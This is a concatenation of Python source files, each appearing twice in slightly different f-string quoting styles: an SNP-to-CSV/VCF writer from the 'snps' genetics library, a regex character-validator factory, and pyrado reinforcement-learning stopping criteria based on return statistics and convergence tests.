buffer filename for file to save or buffer to write to vcf : bool flag to save file as VCF atomic : bool atomically write output to a file on local filesystem **kwargs additional parameters to `pandas.DataFrame.to_csv` """ self._snps = snps self._filename = filename self._vcf = vcf self._atomic = atomic self._kwargs = kwargs def write(self): if self._vcf: return self._write_vcf() else: return (self._write_csv(),) @classmethod def write_file(cls, snps=None, filename="", vcf=False, atomic=True, **kwargs): """Save SNPs to file. Parameters ---------- snps : SNPs SNPs to save to file or write to buffer filename : str or buffer filename for file to save or buffer to write to vcf : bool flag to save file as VCF atomic : bool atomically write output to a file on local filesystem **kwargs additional parameters to `pandas.DataFrame.to_csv` Returns ------- str path to file in output directory if SNPs were saved, else empty str discrepant_vcf_position : pd.DataFrame SNPs with discrepant positions discovered while saving VCF """ w = cls(snps=snps, filename=filename, vcf=vcf, atomic=atomic, **kwargs) return w.write() def _write_csv(self): """Write SNPs to a CSV file. Returns ------- str path to file in output directory if SNPs were saved, else empty str """ filename = self._filename if not filename: ext = ".txt" if "sep" in self._kwargs and self._kwargs["sep"] == ",": ext = ".csv" filename = f"{clean_str(self._snps.source)}_{self._snps.assembly}{ext}" comment = ( f"# Source(s): {self._snps.source}\n" f"# Build: {self._snps.build}\n" f"# Build Detected: { self._snps.build_detected}\n" f"# Phased: {self._snps.phased}\n" f"# SNPs: {self._snps.count}\n" f"# Chromosomes: {self._snps.chromosomes_summary}\n" ) if "header" in self._kwargs: if isinstance(self._kwargs["header"], bool): if self._kwargs["header"]: self._kwargs["header"] = ["chromosome", "position", "genotype"] else: self._kwargs["header"] = ["chromosome", "position", "genotype"] return save_df_as_csv( self._snps._snps, self._snps._output_dir, filename, comment=comment, atomic=self._atomic, **self._kwargs, ) def _write_vcf(self): """Write SNPs to a VCF file. References ---------- 1. The Variant Call Format (VCF) Version 4.2 Specification, 8 Mar 2019, https://samtools.github.io/hts-specs/VCFv4.2.pdf Returns ------- str path to file in output directory if SNPs were saved, else empty str discrepant_vcf_position : pd.DataFrame SNPs with discrepant positions discovered while saving VCF """ filename = self._filename if not filename: filename = f"{clean_str(self._snps.source)}_{self._snps.assembly}{".vcf"}" comment = ( f"##fileformat=VCFv4.2\n" f'##fileDate={datetime.datetime.utcnow().strftime('%Y%m%d')}\n' f'##source="{self._snps.source}; snps v{snps.__version__}; https://pypi.org/project/snps/"\n' ) reference_sequence_chroms = ( "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "20", "21", "22", "X", "Y", "MT", ) df = self._snps.snps p = self._snps._parallelizer tasks = [] # skip insertions and deletions df = df.drop( df.loc[ df["genotype"].notnull() & ( (df["genotype"].str[0] == "I") | (df["genotype"].str[0] == "D") | (df["genotype"].str[1] == "I") | (df["genotype"].str[1] == "D") ) ].index ) chroms_to_drop = [] for chrom in df["chrom"].unique(): if chrom not in reference_sequence_chroms: chroms_to_drop.append(chrom) continue tasks.append( { "resources": self._snps._resources, "assembly": self._snps.assembly, "chrom": chrom, "snps": pd.DataFrame(df.loc[(df["chrom"] == chrom)]), } ) # drop chromosomes without reference sequence data (e.g., unassigned PAR) for chrom in chroms_to_drop: df = df.drop(df.loc[df["chrom"] == chrom].index) # create the VCF representation for SNPs results = p(self._create_vcf_representation, tasks) contigs = [] vcf = [pd.DataFrame()] discrepant_vcf_position = [pd.DataFrame()] for result in list(results): contigs.append(result["contig"]) vcf.append(result["vcf"]) discrepant_vcf_position.append(result["discrepant_vcf_position"]) vcf = pd.concat(vcf) discrepant_vcf_position = pd.concat(discrepant_vcf_position) comment += "".join(contigs) comment += '##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">\n' comment += "#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tSAMPLE\n" return ( save_df_as_csv( vcf, self._snps._output_dir, filename, comment=comment, prepend_info=False, header=False, index=False, na_rep=".", sep="\t", ), discrepant_vcf_position, ) def _create_vcf_representation(self, task): resources = task["resources"] assembly = task["assembly"] chrom = task["chrom"] snps = task["snps"] if len(snps.loc[snps["genotype"].notnull()]) == 0: return { "contig": "", "vcf": pd.DataFrame(), "discrepant_vcf_position": pd.DataFrame(), } seqs = resources.get_reference_sequences(assembly, [chrom]) seq = seqs[chrom] contig = f'##contig=<ID={seq.ID},URL={seq.url},length={seq.length},assembly={seq.build},md5={seq.md5},species="{seq.species}">\n' snps = snps.reset_index() df = pd.DataFrame( columns=[ "CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER", "INFO", "FORMAT", "SAMPLE", ] ) df = df.astype( { "CHROM": object, "POS": np.uint32, "ID": object, "REF": object, "ALT": object, "QUAL": np.float32, "FILTER": object, "INFO": object, "FORMAT": object, "SAMPLE": object, } ) df["CHROM"] = snps["chrom"] df["POS"] = snps["pos"] df["ID"] = snps["rsid"] # drop SNPs with discrepant positions (outside reference sequence) discrepant_vcf_position = snps.loc[ (snps.pos - seq.start < 0) | (snps.pos - seq.start > seq.length - 1) ] df.drop(discrepant_vcf_position.index, inplace=True) # https://stackoverflow.com/a/24838429 df["REF"] = list(map(chr, seq.sequence[df.POS - seq.start])) df["FORMAT"] = "GT" seq.clear() df["genotype"] = snps["genotype"] temp = df.loc[df["genotype"].notnull()] # https://stackoverflow.com/a/19976286 df.loc[df["genotype"].notnull(), "ALT"] = np.vectorize(self._compute_alt)( temp["REF"], temp["genotype"] ) temp = df.loc[df["genotype"].notnull()] df.loc[df["genotype"].notnull(), "SAMPLE"] = np.vectorize( self._compute_genotype )(temp["REF"], temp["ALT"], temp["genotype"]) df.loc[df["SAMPLE"].isnull(), "SAMPLE"] = "./." del df["genotype"] return { "contig": contig, "vcf": df, "discrepant_vcf_position": discrepant_vcf_position, } def _compute_alt(self, ref, genotype): genotype_alleles = list(set(genotype)) if ref in genotype_alleles: if len(genotype_alleles) == 1: return "N" else: genotype_alleles.remove(ref) return genotype_alleles.pop(0) else: genotype_alleles.sort() return ",".join(genotype_alleles) def _compute_genotype(self, ref, alt, genotype): alleles = [ref] if self._snps.phased: separator = "|" else: separator = "/" if pd.notna(alt): alleles.extend(alt.split(",")) if len(genotype) == 2: return ( f"{alleles.index(genotype[0])}{separator}{alleles.index(genotype[1])}" ) else: return f"{alleles.index(genotype[0])}"
""" Class for writing SNPs. """ """ BSD 3-Clause License Copyright (c) 2019, Andrew Riha All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ import datetime import logging import numpy as np import pandas as pd import snps from snps.utils import save_df_as_csv, clean_str logger = logging.getLogger(__name__) class Writer: """Class for writing SNPs to files.""" def __init__(self, snps=None, filename="", vcf=False, atomic=True, **kwargs): """Initialize a `Writer`. Parameters ---------- snps : SNPs SNPs to save to file or write to buffer filename : str or buffer filename for file to save or buffer to write to vcf : bool flag to save file as VCF atomic : bool atomically write output to a file on local filesystem **kwargs additional parameters to `pandas.DataFrame.to_csv` """ self._snps = snps self._filename = filename self._vcf = vcf self._atomic = atomic self._kwargs = kwargs def write(self): if self._vcf: return self._write_vcf() else: return (self._write_csv(),) @classmethod def write_file(cls, snps=None, filename="", vcf=False, atomic=True, **kwargs): """Save SNPs to file. Parameters ---------- snps : SNPs SNPs to save to file or write to buffer filename : str or buffer filename for file to save or buffer to write to vcf : bool flag to save file as VCF atomic : bool atomically write output to a file on local filesystem **kwargs additional parameters to `pandas.DataFrame.to_csv` Returns ------- str path to file in output directory if SNPs were saved, else empty str discrepant_vcf_position : pd.DataFrame SNPs with discrepant positions discovered while saving VCF """ w = cls(snps=snps, filename=filename, vcf=vcf, atomic=atomic, **kwargs) return w.write() def _write_csv(self): """Write SNPs to a CSV file. Returns ------- str path to file in output directory if SNPs were saved, else empty str """ filename = self._filename if not filename: ext = ".txt" if "sep" in self._kwargs and self._kwargs["sep"] == ",": ext = ".csv" filename = f"{clean_str(self._snps.source)}_{self._snps.assembly}{ext}" comment = ( f"# Source(s): {self._snps.source}\n" f"# Build: {self._snps.build}\n" f"# Build Detected: { self._snps.build_detected}\n" f"# Phased: {self._snps.phased}\n" f"# SNPs: {self._snps.count}\n" f"# Chromosomes: {self._snps.chromosomes_summary}\n" ) if "header" in self._kwargs: if isinstance(self._kwargs["header"], bool): if self._kwargs["header"]: self._kwargs["header"] = ["chromosome", "position", "genotype"] else: self._kwargs["header"] = ["chromosome", "position", "genotype"] return save_df_as_csv( self._snps._snps, self._snps._output_dir, filename, comment=comment, atomic=self._atomic, **self._kwargs, ) def _write_vcf(self): """Write SNPs to a VCF file. References ---------- 1. The Variant Call Format (VCF) Version 4.2 Specification, 8 Mar 2019, https://samtools.github.io/hts-specs/VCFv4.2.pdf Returns ------- str path to file in output directory if SNPs were saved, else empty str discrepant_vcf_position : pd.DataFrame SNPs with discrepant positions discovered while saving VCF """ filename = self._filename if not filename: filename = f"{clean_str(self._snps.source)}_{self._snps.assembly}{'.vcf'}" comment = ( f"##fileformat=VCFv4.2\n" f'##fileDate={datetime.datetime.utcnow().strftime("%Y%m%d")}\n' f'##source="{self._snps.source}; snps v{snps.__version__}; https://pypi.org/project/snps/"\n' ) reference_sequence_chroms = ( "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "20", "21", "22", "X", "Y", "MT", ) df = self._snps.snps p = self._snps._parallelizer tasks = [] # skip insertions and deletions df = df.drop( df.loc[ df["genotype"].notnull() & ( (df["genotype"].str[0] == "I") | (df["genotype"].str[0] == "D") | (df["genotype"].str[1] == "I") | (df["genotype"].str[1] == "D") ) ].index ) chroms_to_drop = [] for chrom in df["chrom"].unique(): if chrom not in reference_sequence_chroms: chroms_to_drop.append(chrom) continue tasks.append( { "resources": self._snps._resources, "assembly": self._snps.assembly, "chrom": chrom, "snps": pd.DataFrame(df.loc[(df["chrom"] == chrom)]), } ) # drop chromosomes without reference sequence data (e.g., unassigned PAR) for chrom in chroms_to_drop: df = df.drop(df.loc[df["chrom"] == chrom].index) # create the VCF representation for SNPs results = p(self._create_vcf_representation, tasks) contigs = [] vcf = [pd.DataFrame()] discrepant_vcf_position = [pd.DataFrame()] for result in list(results): contigs.append(result["contig"]) vcf.append(result["vcf"]) discrepant_vcf_position.append(result["discrepant_vcf_position"]) vcf = pd.concat(vcf) discrepant_vcf_position = pd.concat(discrepant_vcf_position) comment += "".join(contigs) comment += '##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">\n' comment += "#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tSAMPLE\n" return ( save_df_as_csv( vcf, self._snps._output_dir, filename, comment=comment, prepend_info=False, header=False, index=False, na_rep=".", sep="\t", ), discrepant_vcf_position, ) def _create_vcf_representation(self, task): resources = task["resources"] assembly = task["assembly"] chrom = task["chrom"] snps = task["snps"] if len(snps.loc[snps["genotype"].notnull()]) == 0: return { "contig": "", "vcf": pd.DataFrame(), "discrepant_vcf_position": pd.DataFrame(), } seqs = resources.get_reference_sequences(assembly, [chrom]) seq = seqs[chrom] contig = f'##contig=<ID={seq.ID},URL={seq.url},length={seq.length},assembly={seq.build},md5={seq.md5},species="{seq.species}">\n' snps = snps.reset_index() df = pd.DataFrame( columns=[ "CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER", "INFO", "FORMAT", "SAMPLE", ] ) df = df.astype( { "CHROM": object, "POS": np.uint32, "ID": object, "REF": object, "ALT": object, "QUAL": np.float32, "FILTER": object, "INFO": object, "FORMAT": object, "SAMPLE": object, } ) df["CHROM"] = snps["chrom"] df["POS"] = snps["pos"] df["ID"] = snps["rsid"] # drop SNPs with discrepant positions (outside reference sequence) discrepant_vcf_position = snps.loc[ (snps.pos - seq.start < 0) | (snps.pos - seq.start > seq.length - 1) ] df.drop(discrepant_vcf_position.index, inplace=True) # https://stackoverflow.com/a/24838429 df["REF"] = list(map(chr, seq.sequence[df.POS - seq.start])) df["FORMAT"] = "GT" seq.clear() df["genotype"] = snps["genotype"] temp = df.loc[df["genotype"].notnull()] # https://stackoverflow.com/a/19976286 df.loc[df["genotype"].notnull(), "ALT"] = np.vectorize(self._compute_alt)( temp["REF"], temp["genotype"] ) temp = df.loc[df["genotype"].notnull()] df.loc[df["genotype"].notnull(), "SAMPLE"] = np.vectorize( self._compute_genotype )(temp["REF"], temp["ALT"], temp["genotype"]) df.loc[df["SAMPLE"].isnull(), "SAMPLE"] = "./." del df["genotype"] return { "contig": contig, "vcf": df, "discrepant_vcf_position": discrepant_vcf_position, } def _compute_alt(self, ref, genotype): genotype_alleles = list(set(genotype)) if ref in genotype_alleles: if len(genotype_alleles) == 1: return "N" else: genotype_alleles.remove(ref) return genotype_alleles.pop(0) else: genotype_alleles.sort() return ",".join(genotype_alleles) def _compute_genotype(self, ref, alt, genotype): alleles = [ref] if self._snps.phased: separator = "|" else: separator = "/" if pd.notna(alt): alleles.extend(alt.split(",")) if len(genotype) == 2: return ( f"{alleles.index(genotype[0])}{separator}{alleles.index(genotype[1])}" ) else: return f"{alleles.index(genotype[0])}"
import re from typing import Union, List, Callable, Match, Optional __all__ = ["create_validator"] def create_validator( valid_characters: Union[str, List[str]], case_sensitive: bool = True ) -> Callable[[str], Optional[Match[str]]]: """Function that generates a callable, regular-expression based sequence validator. When called on a given string, the validator will return a Match object if every character is one of the valid_characters, else None. Parameters ---------- valid_characters : Union[str, List[str]] A string or list of single-character strings defining the set of valid characters. case_sensitive : bool False if both upper- and lower-case characters in valid_characters are valid. Default True. Returns ------- Callable[[str, int, int], Optional[Match[str]]] Callable validator that uses re.fullmatch. Raises ------ ValueError If valid_characters is a list containing multiple characters per entry. """ if isinstance(valid_characters, list): if not all(len(c) == 1 for c in valid_characters): raise ValueError("expected a list of single characters") if case_sensitive: charset = set(valid_characters) else: charset = set(c.upper() for c in valid_characters) charset.update(c.lower() for c in valid_characters) pattern_string = f"[{"".join(charset)}]+" return re.compile(pattern_string).fullmatch
import re from typing import Union, List, Callable, Match, Optional __all__ = ["create_validator"] def create_validator( valid_characters: Union[str, List[str]], case_sensitive: bool = True ) -> Callable[[str], Optional[Match[str]]]: """Function that generates a callable, regular-expression based sequence validator. When called on a given string, the validator will return a Match object if every character is one of the valid_characters, else None. Parameters ---------- valid_characters : Union[str, List[str]] A string or list of single-character strings defining the set of valid characters. case_sensitive : bool False if both upper- and lower-case characters in valid_characters are valid. Default True. Returns ------- Callable[[str, int, int], Optional[Match[str]]] Callable validator that uses re.fullmatch. Raises ------ ValueError If valid_characters is a list containing multiple characters per entry. """ if isinstance(valid_characters, list): if not all(len(c) == 1 for c in valid_characters): raise ValueError("expected a list of single characters") if case_sensitive: charset = set(valid_characters) else: charset = set(c.upper() for c in valid_characters) charset.update(c.lower() for c in valid_characters) pattern_string = f"[{''.join(charset)}]+" return re.compile(pattern_string).fullmatch
# Copyright (c) 2020, Fabio Muratore, Honda Research Institute Europe GmbH, and # Technical University of Darmstadt. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of Fabio Muratore, Honda Research Institute Europe GmbH, # or Technical University of Darmstadt, nor the names of its contributors may # be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL FABIO MURATORE, HONDA RESEARCH INSTITUTE EUROPE GMBH, # OR TECHNICAL UNIVERSITY OF DARMSTADT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from abc import abstractmethod from enum import Enum from typing import List, NoReturn, Optional import numpy as np import scipy as sp import scipy.stats import pyrado from pyrado.algorithms.stopping_criteria.stopping_criterion import StoppingCriterion from pyrado.algorithms.utils import RolloutSavingWrapper from pyrado.sampling.sampler import SamplerBase class ReturnStatistic(Enum): """All the different return statistics supported by `ReturnStatisticBasedStoppingCriterion`.""" min = 0 max = 1 median = 2 mean = 3 variance = 4 class RolloutBasedStoppingCriterion(StoppingCriterion): """ Abstract extension of the base `StoppingCriterion` class for criteria that are based on having access to rollouts. .. note:: Requires the algorithm to expose a `RolloutSavingWrapper` via a property `sampler`. """ def is_met(self, algo) -> bool: """ Gets the sampler from the algorithm, checks if it is a `RolloutSavingWrapper` and forwards the check if of the stopping criterion to `_is_met_with_sampler(..)`. :param algo: instance of `Algorithm` that has to be evaluated :return: `True` if the criterion is met, and `False` otherwise """ if not hasattr(algo, "sampler"): raise pyrado.ValueErr( msg="Any rollout-based stopping criterion requires the algorithm to expose a property 'sampler'!" ) sampler: Optional[SamplerBase] = algo.sampler if not isinstance(sampler, RolloutSavingWrapper): raise pyrado.TypeErr( msg="Any rollout-based stopping criterion requires the algorithm to expose a sampler of type " "'RolloutSavingWrapper' via the property 'sampler'!" ) return self._is_met_with_sampler(algo, sampler) @abstractmethod def _is_met_with_sampler(self, algo, sampler: RolloutSavingWrapper) -> bool: """ Checks whether the stopping criterion is met. .. note:: Has to be overwritten by sub-classes. :param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :return: `True` if the criterion is met, and `False` otherwise """ raise NotImplementedError() class ReturnStatisticBasedStoppingCriterion(RolloutBasedStoppingCriterion): """ Abstract extension of the base `RolloutBasedStoppingCriterion` class for criteria that are based on a specific statistic of the returns of rollouts of the last iteration. """ def __init__(self, return_statistic: ReturnStatistic = ReturnStatistic.median, num_lookbacks: int = 1): """ Constructor. :param return_statistic: statistic to compute; defaults to median :param num_lookbacks: over how many iterations the statistic should be computed; for example, a value of two means that the rollouts of both the current and the previous iteration will be used for computing the statistic; defaults to one """ super().__init__() self._return_statistic = return_statistic self._num_lookbacks = num_lookbacks def _is_met_with_sampler(self, algo, sampler: RolloutSavingWrapper) -> bool: """ Computes the return statistic if enough iterations have passed and forwards the computed statistic to the method `_is_met_with_return_statistic`. :param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :return: `True` if the criterion is met, and `False` otherwise """ if len(sampler.rollouts) < self._num_lookbacks: return False step_sequences = sampler.rollouts[-self._num_lookbacks :] returns = [rollout.undiscounted_return() for step_sequence in step_sequences for rollout in step_sequence] return_statistic = self._compute_return_statistic(np.asarray(returns)) return self._is_met_with_return_statistic(algo, sampler, return_statistic) @abstractmethod def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool: """ Checks whether the stopping criterion is met. .. note:: Has to be overwritten by sub-classes. :param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :param return_statistic: statistic that has been computed for the latest rollouts :return: `True` if the criterion is met, and `False` otherwise """ raise NotImplementedError() def _compute_return_statistic(self, returns: np.ndarray) -> float: """ Computes the desired statistic of the given list of returns according to the statistic requested in the constructor. :param returns: returns :return: statistic """ if self._return_statistic is ReturnStatistic.min: return np.min(returns) if self._return_statistic is ReturnStatistic.max: return np.max(returns) if self._return_statistic is ReturnStatistic.median: return np.quantile(returns, q=0.50) if self._return_statistic is ReturnStatistic.mean: return np.mean(returns).item() if self._return_statistic is ReturnStatistic.variance: return returns.var().item() raise pyrado.ValueErr(msg=f"Unexpected return statistic {self._return_statistic}!") class MinReturnStoppingCriterion(ReturnStatisticBasedStoppingCriterion): """ Uses any statistic (defaulting to min) of the return of the latest rollout as a stopping criterion and stops if this statistic exceeds a certain threshold. """ def __init__(self, return_threshold: float, return_statistic: ReturnStatistic = ReturnStatistic.min): """ Constructor. :param return_threshold: return threshold; if the return statistic reaches this threshold, the stopping criterion is met :param return_statistic: statistic to compute; defaults to minimum """ super().__init__(return_statistic=return_statistic) self._return_threshold = return_threshold def __repr__(self) -> str: return f"MinReturnStoppingCriterion[return_statistic={self._return_statistic}, min_return={self._return_threshold}]" def __str__(self) -> str: return f"({self._return_statistic} return >= {self._return_threshold})" def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool: """Returns whether the return statistic is greater than or equal to the return threshold.""" return return_statistic >= self._return_threshold class ConvergenceStoppingCriterion(ReturnStatisticBasedStoppingCriterion): """ Checks for convergence of the returns for a given statistic that can be specified in the constructor. This is done by fitting a linear regression model to all the previous statistics (stored in a list) and performing a Wald test with a t-distribution of the test statistic (with the null hypothesis that the slope is zero). The resulting p-value is called the *probability of convergence* and is used for checking if the algorithm has converged. This procedure can intuitively be explained by measuring "how flat the returns are" in the presence of noise. It has the advantage over just checking how much the return changes that it is independent of the noise on the returns, i.e. no specific threshold has to be hand-tuned. This criterion has to modes: moving and cumulative. In the moving mode, only the latest `M` values are used for fitting the linear model, and in the first `M - 1` iterations the criterion is treated as not being met. In the cumulative mode, all the previous values are used and only the first iteration is treated as not being met as there have to be at least two points to fit a linear model. While the former is primarily useful for convergence checking for a regular algorithm, the latter is primarily useful for checking convergence of the subroutine in a meta-algorithm as here it is possible that convergence kicks in far at the beginning of the learning process as the environment did not change much (see for example SPRL). It might be helpful to use this stopping criterion in conjunction with an iterations criterion (`IterCountStoppingCriterion`) to ensure that the algorithm does not terminate prematurely due to initialization issues. For example, PPO usually takes some iterations to make progress which leads to a flat learning curve that however does not correspond to the algorithm being converged. """ def __init__( self, convergence_probability_threshold: float = 0.99, num_iter: Optional[int] = None, return_statistic: ReturnStatistic = ReturnStatistic.median, num_lookbacks: int = 1, ): """ Constructor. :param convergence_probability_threshold: threshold of the p-value above which the algorithm is considered to be converged; defaults to `0.99`, i.e. a `99%` certainty that the data can be explained :param num_iter: number of iterations to use for the moving mode. If `None`, the cumulative mode is used :param return_statistic: statistic to compute; defaults to median :param num_lookbacks: over how many iterations the statistic should be computed; for example, a value of two means that the rollouts of both the current and the previous iteration will be used for computing the statistic; defaults to one """ super().__init__(return_statistic, num_lookbacks) if not (num_iter is None or num_iter > 0): raise pyrado.ValueErr(msg="M must be either None or a positive number.") self._convergence_probability_threshold = convergence_probability_threshold self._num_iter = num_iter self._return_statistic_history = [] def __repr__(self) -> str: return ( f"ConvergenceStoppingCriterion[" f"convergence_probability_threshold={self._convergence_probability_threshold}, " f"num_iter={self._num_iter}, " f"return_statistic={self._return_statistic}, " f"num_lookbacks={self._num_lookbacks}, " f"return_statistic_history={self._return_statistic_history}]" ) def __str__(self) -> str: return ( f"({self._return_statistic} return converged, {"cumulative" if self._num_iter is None else "moving"} mode)" ) def _reset(self) -> NoReturn: self._return_statistic_history = [] def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool: """Returns whether the convergence probability is greater than or equal to the threshold.""" self._return_statistic_history.append(return_statistic) convergence_prob = self._compute_convergence_probability() if convergence_prob is None: return False return convergence_prob >= self._convergence_probability_threshold def _compute_convergence_probability(self) -> Optional[float]: """ Computes the convergence probability for the current data. By invoking `_get_relevant_return_statistic_subset`, the two modes (moving and cumulative) are implemented. If not enough data is present, this method does not return the probability, but `None`. .. note:: This invoked the method `linregress` of `scipy.stats` and returns the corresponing p-value. .. seealso:: https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.linregress.html :return the convergence probability or `None` if not enough data is present """ statistic_subset = self._get_relevant_return_statistic_subset() if statistic_subset is None: return None return sp.stats.linregress(range(len(statistic_subset)), statistic_subset).pvalue def _get_relevant_return_statistic_subset(self) -> Optional[List[float]]: """ Extracts the relevant subset of the return statistic history, implementing the two modes described in the class documentation: moving and cumulative. If either the return history is empty or does not contain enough elements for getting `M` elements, `None` is returned. The convergence checking method shall treat this as the convergence criterion not being met as there is not enough data. :return: the relevant subset """ if len(self._return_statistic_history) <= 0: return None if self._num_iter is None: return self._return_statistic_history if len(self._return_statistic_history) < self._num_iter: return None return self._return_statistic_history[-self._num_iter :]
# Copyright (c) 2020, Fabio Muratore, Honda Research Institute Europe GmbH, and # Technical University of Darmstadt. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of Fabio Muratore, Honda Research Institute Europe GmbH, # or Technical University of Darmstadt, nor the names of its contributors may # be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL FABIO MURATORE, HONDA RESEARCH INSTITUTE EUROPE GMBH, # OR TECHNICAL UNIVERSITY OF DARMSTADT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from abc import abstractmethod from enum import Enum from typing import List, NoReturn, Optional import numpy as np import scipy as sp import scipy.stats import pyrado from pyrado.algorithms.stopping_criteria.stopping_criterion import StoppingCriterion from pyrado.algorithms.utils import RolloutSavingWrapper from pyrado.sampling.sampler import SamplerBase class ReturnStatistic(Enum): """All the different return statistics supported by `ReturnStatisticBasedStoppingCriterion`.""" min = 0 max = 1 median = 2 mean = 3 variance = 4 class RolloutBasedStoppingCriterion(StoppingCriterion): """ Abstract extension of the base `StoppingCriterion` class for criteria that are based on having access to rollouts. .. note:: Requires the algorithm to expose a `RolloutSavingWrapper` via a property `sampler`. """ def is_met(self, algo) -> bool: """ Gets the sampler from the algorithm, checks if it is a `RolloutSavingWrapper` and forwards the check if of the stopping criterion to `_is_met_with_sampler(..)`. :param algo: instance of `Algorithm` that has to be evaluated :return: `True` if the criterion is met, and `False` otherwise """ if not hasattr(algo, "sampler"): raise pyrado.ValueErr( msg="Any rollout-based stopping criterion requires the algorithm to expose a property 'sampler'!" ) sampler: Optional[SamplerBase] = algo.sampler if not isinstance(sampler, RolloutSavingWrapper): raise pyrado.TypeErr( msg="Any rollout-based stopping criterion requires the algorithm to expose a sampler of type " "'RolloutSavingWrapper' via the property 'sampler'!" ) return self._is_met_with_sampler(algo, sampler) @abstractmethod def _is_met_with_sampler(self, algo, sampler: RolloutSavingWrapper) -> bool: """ Checks whether the stopping criterion is met. .. note:: Has to be overwritten by sub-classes. :param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :return: `True` if the criterion is met, and `False` otherwise """ raise NotImplementedError() class ReturnStatisticBasedStoppingCriterion(RolloutBasedStoppingCriterion): """ Abstract extension of the base `RolloutBasedStoppingCriterion` class for criteria that are based on a specific statistic of the returns of rollouts of the last iteration. """ def __init__(self, return_statistic: ReturnStatistic = ReturnStatistic.median, num_lookbacks: int = 1): """ Constructor. :param return_statistic: statistic to compute; 